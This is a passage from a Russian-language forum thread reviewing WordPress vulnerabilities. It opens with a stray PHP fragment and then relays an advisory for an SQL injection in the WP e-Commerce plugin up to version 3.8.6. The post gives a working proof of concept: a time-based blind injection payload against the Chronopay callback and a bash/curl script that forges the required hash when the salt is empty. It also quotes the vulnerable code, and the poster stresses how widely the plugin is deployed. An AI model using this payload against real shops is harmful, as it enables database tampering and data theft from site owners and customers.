   $wppa['out'] .= wppa_nltab().'<a href="#" class="wppa-nav-text b30" style="'.__wcs('wppa-nav-text').'" ></a>';
   $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b31" style="'.__wcs('wppa-nav-text').'" >'.$title.$sep.'</span>';
  } else {
   $wppa['out'] .= wppa_nltab().'<a href="'.get_page_link($parent).'" class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$title.'</a>';
   $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$sep.'</span>';
  }
}
 
DecideДата: Среда, 14.11.2012, 11:09 | Сообщение # 90
Полковник
Группа: Администраторы
Сообщений: 241
Репутация: 0
Статус: Offline
WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability

оДИН из самых популярных плагинов для WP!
Докуя сайтов) работает на каждом втором сайте и чаще)

Цитата:
---------------
PoC (POST data)
---------------
http://www.сайт.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill

e.g.
#!/bin/bash
payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11 2))),0)#"
hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr -d '\n' | sed 's/\s*-\s*//g'`
curl --data "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill" http://www.site.com/?chronopay_callback=true

---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php:

class WP_eCommerce {

function WP_eCommerce() {
add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
}

function init() {
...
$this->load();
...
}
function load() {
...
wpsc_core_load_gateways();
...
}
...
$wpec = new WP_eCommerce();

./wp-e-commerce/wpsc-core/wpsc-functions.php:

function wpsc_core_load_gateways() {
global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;

$gateway_directory = WPSC_FILE_PATH . '/wpsc-merchants';
$nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );

$num = 0;
foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchant );
}

./wp-e-commerce/wpsc-merchants/chronopay.php:

function nzshpcrt_chronopay_callback()
{
...
if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
{
$salt = get_option('chronopay_salt');
// - this is by default '' and set only if explicitly stated
// inside Store Settings->Payments->General Settings->
// Chronopay->Edit->Security Key
// - problem is that there are more popular payment gateways enlisted (e.g.
// Google Checkout and PayPal) and if that setting is not explicitly set
// it wide opens the door to the potential attacker

$gen_hash = md5($salt . md5($_POST['cs1'] . $salt));

if($gen_hash == $_POST['cs3'])
{
...
$sessionid = trim(stripslashes($_POST['cs1']));
$transaction_id = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));

switch($verification_data['trans_type'])
{
...
case 'rebill':
$wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
`processed` = '2',
`transactid` = '".$transaction_id."',
`date` = '".time()."'
WHERE `sessionid` = ".$sessionid." LIMIT 1");
...
add_action('init', 'nzshpcrt_chronopay_callback');
 
Проверка сайта на уязвимости! » Форум » Уязвимости » Обзор уязвимостей WordPress
  • Страница 6 из 7
  • «
  • 1
  • 2
  • 4
  • 5
  • 6
  • 7
  • »
Поиск:

Вторник, 24.05.2022, 02:29
Copyright MyCorp © 2022Бесплатный хостинг uCoz